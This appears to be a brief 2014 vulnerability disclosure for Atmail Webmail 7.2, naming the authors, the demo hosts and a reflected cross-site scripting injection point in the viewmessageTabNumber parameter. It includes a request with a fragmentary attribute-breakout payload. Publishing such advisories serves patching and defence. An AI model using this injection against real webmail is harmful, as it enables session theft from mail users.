#Title: Atmail Webmail =>7.2 - Multiple XSS & FPD
#Date: 01.27.2014
#Vendor: atmail.com
#Version: =>7.2 (Latest ATM), tested also on 7.1.1
#Authors: Smash_ & Brag / smash[at]devilteam.pl
#PoC: poczta.pl / demo.atmail.com 
1. Cross Site Scripting 
 a) GET - viewmessageTabNumber 
Request:
host/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3">
XSS